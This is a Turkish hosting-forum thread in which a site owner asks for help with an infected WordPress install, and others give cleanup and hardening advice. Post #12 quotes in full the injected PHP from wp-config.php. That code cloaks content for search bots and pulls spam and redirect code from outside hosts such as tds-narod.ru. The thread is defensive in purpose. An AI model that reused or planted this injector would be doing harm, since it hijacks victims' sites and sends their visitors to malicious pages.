• 11-04-2019, 17:00:45
    #10
    Kimlik doğrulama veya yönetimden onay bekliyor.
    teknolojig adlı üyeden alıntı: mesajı görüntüle
    Hocam sunucudaki diğer sitelerede aynı virüs bulaştıysa direkt sitelerinizi başka bir hostinge taşıyın zaten alacağınız yeni hizmette CageFS özelliğinin olması şart aksi durumda sizde bir açık olmasa da sunucudaki diğer sitelerin açıkları sizede virüs bulaşmasına sebep olabilir.
    Kısa süre önce yeniledim hosting paketimi 3 yıllık. Aynen diğer sitelererde bulaştı malesef.
  • 11-04-2019, 17:05:01
    #11
    bayvonali adlı üyeden alıntı: mesajı görüntüle
    Kısa süre önce yeniledim hosting paketimi 3 yıllık. Aynen diğer sitelererde bulaştı malesef.
    Hocam iade alacaksın yapacak birşey yok yada söyleyin firmaya onlar kursunlar sistemlerine CageFS
  • 12-04-2019, 17:25:58
    #12
    Son olarak wp-config dosyası içine en başına aşağıda ki gibi bir kod eklendiğini fark ettim.

    <?php
    if(!defined('_NET'))
    {
    error_reporting(0);
    $NET='sh19042';
    define('_NET',$NET);
    if(function_exists('date_default_timezone_set')){date_default_timezone_set('America/Los_Angeles');}$sll0='http://googlecountwebs.com/';$pinj_0='http://tds-err.com/i?r=1';$pinj_1='http://tds-narod.ru/i.txt';$FNN='lnk-trans2.php';$pinj_2='yahoo';$pinj_2='bing';$pinj_3=str_replace('google',$pinj_1,$sll0);$pinj_4='site';$sll0=str_replace('google',$pinj_4,$sll0);$pinj_5='';$pinj_6='';$pinj_7='';$pinj_8='';if(!empty($_SERVER['HTTP_USER_AGENT'])){$pinj_6=$_SERVER['HTTP_USER_AGENT'];}if(!empty($_SERVER['HTTP_REFERER'])){$pinj_5=$_SERVER['HTTP_REFERER'];}if(!empty($_SERVER['REQUEST_URI'])){$pinj_7=$_SERVER['REQUEST_URI'];}if(!empty($_SERVER['REMOTE_ADDR'])){$pinj_8=$_SERVER['REMOTE_ADDR'];}if(!function_exists('get_cont')){function get_cont($pinj_9){if(function_exists('curl_init')){$pinj_10=curl_init();curl_setopt($pinj_10,CURLOPT_URL,$pinj_9);curl_setopt($pinj_10,CURLOPT_HEADER,0);curl_setopt($pinj_10,CURLOPT_NOBODY,0);curl_setopt($pinj_10,CURLOPT_TIMEOUT,35);curl_setopt($pinj_10,CURLOPT_RETURNTRANSFER,1);curl_setopt($pinj_10,CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)");$pinj_11=curl_exec($pinj_10);curl_close($pinj_10);return $pinj_11;}$pinj_12=@file_get_contents($pinj_9);return $pinj_12;}}if(!function_exists('SEbot_')){function SEbot_($pinj_13){if(strpos('-' .strtolower($pinj_13),'googlebot',0)>0){return 1;}if(strpos('-' .strtolower($pinj_13),'slurp',0)>0){return 1;}if(strpos('-' .strtolower($pinj_13),'bing',0)>0){return 1;}if(strpos('-' .strtolower($pinj_13),'msnbot',0)>0){return 1;}if(strpos('-' .strtolower($pinj_13),'yahoo',0)>0){return 1;}return 0;}}if(!function_exists('not_do_')){function not_do_($pinj_14){$pinj_15='gif|jpeg|png|js|css|swf|ico|txt|pdf|xml|jpg|pdf|doc';$pinj_16=explode("|",$pinj_15);$pinj_17=0;while($pinj_17<count($pinj_18)){if(strpos(' ' .strtolower($pinj_14),$pinj_18[$pinj_17],0)>0)return 1;$pinj_17=$pinj_17+1;}return 0;}}if(!function_exists('detect_encoding_')){function detect_encoding_($pinj_19){static $pinj_20=array('UTF-8','ASCII','Windows-1251','ISO-8859-2','ISO-8859-3','ISO-8859-4','ISO-8859-5','ISO-8859-6','ISO-8859-7','ISO-8859-8','ISO-8859-9','ISO-8859-10','ISO-8859-13','ISO-8859-14','ISO-8859-15','ISO-8859-16','ISO-8859-1','Windows-1252','Windows-1254',);foreach($pinj_20 as $pinj_21){$pinj_22=@iconv($pinj_21,$pinj_21 .'',$pinj_19);if(md5($pinj_22)== md5($pinj_19))return $pinj_21;}return null;}}if(isset($_SERVER['HTTPS'])&&($_SERVER['HTTPS']=='on')){$pinj_23='https';}else{$pinj_23='http';}$pinj_24=substr(str_replace('www.','',$_SERVER['SERVER_NAME']),0,4);if((SEbot_($pinj_6)>0)&&empty($pinj_25)&&(not_do_($pinj_7)==0)){$pinj_26=get_cont($sll0 .$FNN .'?d=' .$_SERVER['SERVER_NAME'] .'&NET=' .$NET .'&u=' .urlencode($pinj_7) .'&prot=' .$pinj_23);$pinj_25=get_cont($pinj_23 .'://' .$_SERVER['SERVER_NAME'] .$pinj_7);if(strlen($pinj_25)>200){if(strpos($pinj_26,'"ttl"',0)>0){$pinj_27=@unserialize($pinj_26);$pinj_28="rn" .'<meta name="description" content="' .$pinj_27['dsc'] .'"/>' ."rn";$pinj_29=array("'<li>.*?</li>'si","'<li [^>]*?>.*?</li>'si");$pinj_30=array("","");$pinj_31=preg_replace($pinj_29,$pinj_30,$pinj_25);$pinj_29=array("'<noscript[^>]*?>.*?</noscript>'si");$pinj_30=array("");$pinj_31=preg_replace($pinj_29,$pinj_30,$pinj_31);$pinj_31=str_replace('></a>','> </a>',$pinj_31);$pinj_31=preg_replace('/<a(.+?)href=("|')(.+?)("|')(.*?)>(.+?)</a>/i',"",$pinj_31);$pinj_31=str_replace("</li>",'',$pinj_31);$pinj_31=str_replace("<ul>",'',$pinj_31);$pinj_31=str_replace("</ul>",'',$pinj_31);$pinj_29=array("'<h1 [^>]*?>.*?</h1>'si","'<h2 [^>]*?>.*?</h2>'si","'<h2>.*?</h2>'si","'<iframe [^>]*?>.*?</iframe>'si","'<h3[^>]*?>.*?</h3>'si","'<h4[^>]*?>.*?</h4>'si","'<h5[^>]*?>.*?</h5>'si");$pinj_30=array("","","","","","","");$pinj_31=preg_replace($pinj_29,$pinj_30,$pinj_31);$pinj_32=0;$pinj_33=@explode('>',$pinj_31);$pinj_17=0;$pinj_34='';$pinj_35='';$pinj_36='';$pinj_37='';$pinj_38=0;$pinj_39=0;$pinj_40=0;if(strpos('-' .strtolower($pinj_31),'<body',0)<=0){$pinj_41=1;}else{$pinj_41=0;}while($pinj_17<count($pinj_33)){if((strpos('-' .strtolower($pinj_33[$pinj_17]),'<body',0)>0)&&($pinj_41==0)){$pinj_41=1;}$pinj_42=explode('<',$pinj_33[$pinj_17]);$pinj_42[0]=trim($pinj_42[0]);if((strlen($pinj_42[0])>40)){if((strpos($pinj_42[0],'=',0)<=0)&&(strpos($pinj_42[0],'}',0)<=0)&&(strpos($pinj_42[0],'{',0)<=0)&&(strpos($pinj_42[0],'+',0)<=0)&&(strpos($pinj_42[0],');',0)<=0)&&(!preg_match("/.[a-zA-Z]/i",$pinj_42[0]))){if((strlen($pinj_35)<strlen($pinj_42[0]))&&(strlen($pinj_35)<80)&&($pinj_41==1)){$pinj_35=$pinj_42[0];$pinj_38=$pinj_17;}elseif((strlen($pinj_36)<strlen($pinj_42[0]))&&($pinj_41==1)){$pinj_36=$pinj_42[0];$pinj_39=$pinj_17;}elseif((strlen($pinj_37)<strlen($pinj_42[0]))&&($pinj_41==1)){$pinj_37=$pinj_42[0];$pinj_40=$pinj_17;}}}$pinj_17=$pinj_17+1;}$pinj_43="<h1>" .$pinj_27['h1'] ."</h1> rn " .$pinj_27['txt1'] ."";$pinj_44=$pinj_27['txt2'];$pinj_45=$pinj_27['txt3'];if($pinj_40==0){$pinj_44=$pinj_44 .' ' .$pinj_45;$pinj_45='';}if($pinj_39==0){$pinj_43=$pinj_43 .' ' .$pinj_44;$pinj_44='';}$pinj_46='';if($pinj_38==0){$pinj_46=$pinj_43;}$pinj_17=0;while($pinj_17<count($pinj_33)){$pinj_42=@explode('<',$pinj_33[$pinj_17]);$pinj_42[0]=trim($pinj_42[0]);if((strlen($pinj_42[0])>40)){if((strpos($pinj_42[0],'=',0)<=0)&&(strpos($pinj_42[0],'}',0)<=0)&&(strpos($pinj_42[0],'{',0)<=0)&&(strpos($pinj_42[0],'+',0)<=0)&&(strpos($pinj_42[0],');',0)<=0)&&(!preg_match("/.[a-zA-Z]/i",$pinj_42[0]))){if(($pinj_17==$pinj_40)){$pinj_42[0]='-vst3-';}elseif($pinj_17==$pinj_39){$pinj_42[0]='-vst2-';}elseif($pinj_17==$pinj_38){$pinj_42[0]='-vst1-';}else{$pinj_42[0]='';}}}$pinj_33[$pinj_17]=@implode('<',$pinj_42);if(isset($pinj_47)){echo $pinj_33[$pinj_17];exit;}if($pinj_34==''){$pinj_34=$pinj_33[$pinj_17];}else{if((strpos(strtolower('-' .$pinj_33[$pinj_17]),'meta',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'keywords',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'meta',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'description',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'meta',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'title',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'property',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'og:',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'link',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'alternate',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'link',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'canonical',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'rel=',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'alternate',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'rel=',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'contents',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'charset=',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'<title',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'</title',0)<=0)){$pinj_34=$pinj_34 .'> ' .$pinj_28 ."rn" .' <title>' .$pinj_27['ttl'] .'</title';$pinj_48=2;}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'<body',0)>0)){$pinj_34=$pinj_34 .'>' .$pinj_33[$pinj_17] .'> ' .$pinj_46;$pinj_48=1;}else{if(isset($pinj_48)&&($pinj_48==1)){$pinj_34=$pinj_34 .'' .$pinj_33[$pinj_17];$pinj_48=0;}elseif(isset($pinj_48)&&($pinj_48==2)){$pinj_34=$pinj_34 .'';$pinj_48=0;}else{$pinj_34=$pinj_34 .'>' .$pinj_33[$pinj_17];}}}$pinj_17=$pinj_17+1;}$pinj_34=str_replace(array('-vst1-','-vst2-','-vst3-'),array($pinj_43,$pinj_44,$pinj_45),$pinj_34);$pinj_34=str_replace("</head>",'<meta charset="utf-8"> </head>',$pinj_34);$pinj_34=str_replace("</HEAD>",'<meta charset="utf-8"> </head>',$pinj_34);$pinj_34=str_replace("</Head>",'<meta charset="utf-8"> </head>',$pinj_34);$pinj_34=str_replace('< <','<',$pinj_34);$pinj_34=str_replace('<?<','<',$pinj_34);$pinj_34=str_replace('<<','<',$pinj_34);$pinj_34=str_replace("<n",'',$pinj_34);$pinj_34=preg_replace("/d{2}.d{2}.d{4}/","",$pinj_34);$pinj_34=preg_replace("/d{2}-d{2}-d{4}/","",$pinj_34);$pinj_34=preg_replace("/d{1}.d{2}.d{4}/","",$pinj_34);$pinj_34=preg_replace("/d{4}.d{2}.d{2}/","",$pinj_34);$pinj_34=preg_replace("/d{4}-d{2}-d{2}/","",$pinj_34);$pinj_34=preg_replace('/nn+/',"n",$pinj_34);$pinj_34=preg_replace('/rnrn+/',"rn",$pinj_34);$pinj_34=preg_replace('/ n n+/',"n",$pinj_34);$pinj_34=str_replace("2010",date('Y'),$pinj_34);$pinj_34=str_replace("2011",date('Y'),$pinj_34);$pinj_34=str_replace("2012",date('Y'),$pinj_34);$pinj_34=str_replace("2013",date('Y'),$pinj_34);$pinj_34=str_replace("2014",date('Y'),$pinj_34);$pinj_34=str_replace("2015",date('Y'),$pinj_34);$pinj_34=str_replace("2016",date('Y'),$pinj_34);$pinj_34=str_replace("2017",date('Y'),$pinj_34);$pinj_49='"ab","az","ay","sq","en","en-us","ar","hy","as","af","ba","be","bn","bg","br","cy","hu","vi","gl","nl","el","ka","gn","da","zu","iw","ji","in","ia","ga","is","es","it","kk","km","ca","ks","qu","ky","zh","ko","co","ku","lo","lv","la","lt","mg","ms","mt","mi","mk","mo","mn","na","de","ne","no","pa","fa","pl","pt","ps","rm","ro","ru","sm","sa","sr","sk","sl","so","sw","su","tl","tg","th","ta","tt","bo","to","tr","tk","uz","uk","ur","fj","fi","fr","fy","ha","hi","hr","cs","sv","eo","et","jw","ja"';$pinj_50=explode(',',$pinj_49);$pinj_34=str_replace($pinj_50,'"' .$pinj_27['lang'] .'"',$pinj_34);echo $pinj_34;exit;}$pinj_51=$pinj_25;$pinj_52=strpos(strtolower($pinj_25),"<body",0);$pinj_53=strpos(strtolower($pinj_25),">",$pinj_52);if(($pinj_52>0)&&($pinj_53>0)){$pinj_25=substr($pinj_51,0,$pinj_53+1) .$pinj_26 .'' .substr($pinj_51,$pinj_53+1);if(strpos(strtolower('-' .$pinj_6),'sape',0)>0){$pinj_25=$pinj_25 .'=*OK*=';}echo $pinj_25;exit;}}}if(isset($pinj_5)&&((strpos($pinj_5,'ogle.',0)>0)||(strpos($pinj_5,'ing.',0)>0)||(strpos($pinj_5,'ahoo.',0)>0))){$pinj_54='mkke';$pinj_55=70;if(!isset($_COOKIE[$pinj_54])||($_COOKIE[$pinj_54]<(time()))){$pinj_56=get_cont($sll0 .$FNN .'?rd=1&d=' .$_SERVER['SERVER_NAME'] .'&NET=' .$NET .'&u=' .urlencode($pinj_7) .'&prot=' .$pinj_23);if(strlen($pinj_56,'<!-- -->',0)>0)$pinj_55=30000;if(strlen($pinj_56)>10){$pinj_57=get_cont($pinj_23 .'://' .$_SERVER['SERVER_NAME'] .$pinj_7);if(strlen($pinj_57)>400){$pinj_56=str_replace('-SID-',$NET,$pinj_56);$pinj_57=str_replace('</head>',$pinj_56 .'</head>',$pinj_57);setcookie($pinj_54,(time()+$pinj_55),(time()+$pinj_55*2),'/','.' .str_replace('www.','',$_SERVER['SERVER_NAME']));echo $pinj_57;exit;}}}}
    }
    /*,.*/
    ?>
  • 15-04-2019, 18:00:16
    #13
    Nod32 ile dosyaları tarattığımda truva atı ve PHP/WP Hack adında 2 çeşit virüs bulaştığını gördüm
  • 15-04-2019, 18:18:12
    #14
    Merhabalar, Sene 2017 de 5 siteme bu virüs bulaştı ve öyle kolay kolayda temizlenmiyor.
    Aşağıdaki yöntemleri eksiksiz ve dikkatlice yapmanız gerekiyor.



    ''Wordpress açıklarından dolayı son zamanda sitelere yapılan saldırılar var.Bu saldırılarda admin bilgileriniz brute force yöntemiyle ele geçirilip sisteminiz üzerine dosyalar upload edilerek *********** faaliyetleri yürütülmektedir.Sorun ciddi olduğundan sitelerinizi güvende tutabileceğiniz bir döküman hazırladık.

    * Eğer bu işlemleri yapacak yetkinlikte değilseniz bir uzmandan ücretli destek almanızı öneririz.

    ----

    Öncelikle Cpanel/Ftp şifrenizi değiştirin.

    Sisteminizin yedeğini oluşturarak bilgisayarınıza indirin.
    Sitenizin çalıştığı dizinleri kontrol edip sisteminize ait olmayan dosya ve dizinleri silin.

    WP-CONTENT dizini altında bir htaccess oluşturarak bu dizin altında php çalıştırılmasına izin vermeyin.Tema ve eklentileriniz buna ihtiyaç duyuyorsa o tema ve eklentileri.
    http://paste.ubuntu.com/23902359/

    WP-CONFIG.PHP VE WP-CONTENT hariç(!) ana dizinde bulunan WP-ADMIN ve WP-INCLUDES dizinleri dahil ana dizine bulunan ayar dosyanız hariç tüm Wordpress dosyaları silin.Ardından son sürüm Wordpress dosyalarını upload edip admin panel sayfasından veritabanını güncelleyin.
    WP-CONTENT ve Uploads dizini hariç tüm dosya ve dizinleri Chmod değerlerini değiştirerek yazılamaz hale getirin!

    Cpanel'de ana user dışında ftp hesabı varsa kaldırın.
    Cpanel hesabınızda sahtekar subdomain, park domain hesapları oluşturulmuşsa kaldırın.

    Yönetici yetkisine sahip kullanıcı hesaplarını gözden geçirin, size ait olmayan kullanıcılar varsa kaldırın.
    Veritabanınızdaki wp-users tablosunu kontrol edin.Panelde kullanıcı olarak görmediğiniz user satırları varsa bunları kaldırın.

    Ayar dosyanızda (wp-config.php) tanımlı SecretKey'i yeniden oluşturarak değiştirin.
    SecretKey Oluştur : https://api.wordpress.org/secret-key/1.1/salt/

    Ayar dosyanızın en üst <?php bir alt satırına dosya düzenleme yetkisi ve cron özelliklerini disable etmek için şu kodları ekleyin.
    define('DISABLE_WP_CRON', true);
    define('DISALLOW_FILE_EDIT', true);

    Veritabanı kullanıcısının şifresini değiştirip tam yetkiye sahipse yetkileri "SELECT, DELETE, INSERT ve UPDATE" seviyesine çekin.

    Sitenizin ana dizininde bulunan Htaccess dosyasına aşağıdaki kodları ekleyerek "xmlrpc.php" ve "wp-cron.php" adreslerine dışarıdan erişime yasaklayın.
    http://paste.ubuntu.com/23902343/

    * Cpanel'inizde Mod Security özelliği varsa Enable olduğundan emin olun.Temanız yada eklentileriniz Mod Security korumsını disable edilmesin istiyorsa bunlarla çalışmayın.Htaccess dosyanızda Mod Security'i disable eden yönergeler varsa bunları kaldırın.

    Tema fonksiyon dosyanıza şu kodları ekleyin.
    http://paste.ubuntu.com/23902132/

    Wordpress admin panel URL adresini "WPS Hide Login" eklentisini kullanarak değiştirin.

    Diğer Wordpress Güvenlik Önerileri ;

    https://codex.wordpress.org/Hardening_WordPress
    https://codex.wordpress.org/FAQ_My_site_was_hacked
    https://perishablepress.com/secure-v...for-wordpress/
    https://www.wordfence.com/blog/2017/...-monetization/ ''

    Alıntıdır.
  • 15-04-2019, 22:46:44
    #15
    Mertcan03 adlı üyeden alıntı: mesajı görüntüle
    Merhabalar, Sene 2017 de 5 siteme bu virüs bulaştı ve öyle kolay kolayda temizlenmiyor.
    Aşağıdaki yöntemleri eksiksiz ve dikkatlice yapmanız gerekiyor.



    ''Wordpress açıklarından dolayı son zamanda sitelere yapılan saldırılar var.Bu saldırılarda admin bilgileriniz brute force yöntemiyle ele geçirilip sisteminiz üzerine dosyalar upload edilerek *********** faaliyetleri yürütülmektedir.Sorun ciddi olduğundan sitelerinizi güvende tutabileceğiniz bir döküman hazırladık.

    * Eğer bu işlemleri yapacak yetkinlikte değilseniz bir uzmandan ücretli destek almanızı öneririz.

    ----

    Öncelikle Cpanel/Ftp şifrenizi değiştirin.

    Sisteminizin yedeğini oluşturarak bilgisayarınıza indirin.
    Sitenizin çalıştığı dizinleri kontrol edip sisteminize ait olmayan dosya ve dizinleri silin.

    WP-CONTENT dizini altında bir htaccess oluşturarak bu dizin altında php çalıştırılmasına izin vermeyin.Tema ve eklentileriniz buna ihtiyaç duyuyorsa o tema ve eklentileri.
    http://paste.ubuntu.com/23902359/

    WP-CONFIG.PHP VE WP-CONTENT hariç(!) ana dizinde bulunan WP-ADMIN ve WP-INCLUDES dizinleri dahil ana dizine bulunan ayar dosyanız hariç tüm Wordpress dosyaları silin.Ardından son sürüm Wordpress dosyalarını upload edip admin panel sayfasından veritabanını güncelleyin.
    WP-CONTENT ve Uploads dizini hariç tüm dosya ve dizinleri Chmod değerlerini değiştirerek yazılamaz hale getirin!

    Cpanel'de ana user dışında ftp hesabı varsa kaldırın.
    Cpanel hesabınızda sahtekar subdomain, park domain hesapları oluşturulmuşsa kaldırın.

    Yönetici yetkisine sahip kullanıcı hesaplarını gözden geçirin, size ait olmayan kullanıcılar varsa kaldırın.
    Veritabanınızdaki wp-users tablosunu kontrol edin.Panelde kullanıcı olarak görmediğiniz user satırları varsa bunları kaldırın.

    Ayar dosyanızda (wp-config.php) tanımlı SecretKey'i yeniden oluşturarak değiştirin.
    SecretKey Oluştur : https://api.wordpress.org/secret-key/1.1/salt/

    Ayar dosyanızın en üst <?php bir alt satırına dosya düzenleme yetkisi ve cron özelliklerini disable etmek için şu kodları ekleyin.
    define('DISABLE_WP_CRON', true);
    define('DISALLOW_FILE_EDIT', true);

    Veritabanı kullanıcısının şifresini değiştirip tam yetkiye sahipse yetkileri "SELECT, DELETE, INSERT ve UPDATE" seviyesine çekin.

    Sitenizin ana dizininde bulunan Htaccess dosyasına aşağıdaki kodları ekleyerek "xmlrpc.php" ve "wp-cron.php" adreslerine dışarıdan erişime yasaklayın.
    http://paste.ubuntu.com/23902343/

    * Cpanel'inizde Mod Security özelliği varsa Enable olduğundan emin olun.Temanız yada eklentileriniz Mod Security korumsını disable edilmesin istiyorsa bunlarla çalışmayın.Htaccess dosyanızda Mod Security'i disable eden yönergeler varsa bunları kaldırın.

    Tema fonksiyon dosyanıza şu kodları ekleyin.
    http://paste.ubuntu.com/23902132/

    Wordpress admin panel URL adresini "WPS Hide Login" eklentisini kullanarak değiştirin.

    Diğer Wordpress Güvenlik Önerileri ;

    https://codex.wordpress.org/Hardening_WordPress
    https://codex.wordpress.org/FAQ_My_site_was_hacked
    https://perishablepress.com/secure-v...for-wordpress/
    https://www.wordfence.com/blog/2017/...-monetization/ ''

    Alıntıdır.
    Bu güzel cevap için çok teşekkür ederim oldukça açıklayıcı olmuş.Az çok anlarım bu işlerden ama söylediklerinizin tamamını yapabileceğimi sanmıyorum. Deneyeceğim.
    Şöyle bir çözüm yapsam olur mu sizce. Web sitemin 2 ay önce ki temiz yedeği mevcut.Dizinde bulunan tüm klasörleri silip bütün şifrelerimi değiştirerek yedek aldığım klasörleri geriye yüklesem virüsten kurtulmuş olur muyum?
  • 15-04-2019, 23:53:34
    #16
    bayvonali adlı üyeden alıntı: mesajı görüntüle
    Bu güzel cevap için çok teşekkür ederim oldukça açıklayıcı olmuş.Az çok anlarım bu işlerden ama söylediklerinizin tamamını yapabileceğimi sanmıyorum. Deneyeceğim.
    Şöyle bir çözüm yapsam olur mu sizce. Web sitemin 2 ay önce ki temiz yedeği mevcut.Dizinde bulunan tüm klasörleri silip bütün şifrelerimi değiştirerek yedek aldığım klasörleri geriye yüklesem virüsten kurtulmuş olur muyum?
    2 ay önce siten de virüs olmadığına eminsen olur ama bu tür virüsler aylar önce bulaşıp uyur vaziyette oluyorlar.
    Yukarida ki işlemler biraz uğraşıldığında yapılabilir.
  • 15-04-2019, 23:55:15
    #17
    Mertcan03 adlı üyeden alıntı: mesajı görüntüle
    2 ay önce siten de virüs olmadığına eminsen olur ama bu tür virüsler aylar önce bulaşıp uyur vaziyette oluyorlar.
    Yukarida ki işlemler biraz uğraşıldığında yapılabilir.
    Virüsün ne zaman neyden dolayı bulaştığını biliyorum o yüzden temiz olduğunu düşünüyorum.İlk olarak basit olan yöntemi deneceyğim o zaman olmazsa sizin adımları denicem.Teşekkürler cevap için
  • 16-04-2019, 13:27:49
    #18
    Üyeliği durduruldu
    bayvonali adlı üyeden alıntı: mesajı görüntüle
    Virüsün ne zaman neyden dolayı bulaştığını biliyorum o yüzden temiz olduğunu düşünüyorum.İlk olarak basit olan yöntemi deneceyğim o zaman olmazsa sizin adımları denicem.Teşekkürler cevap için
    Problemin devamı halinde ulaşabilirsiniz.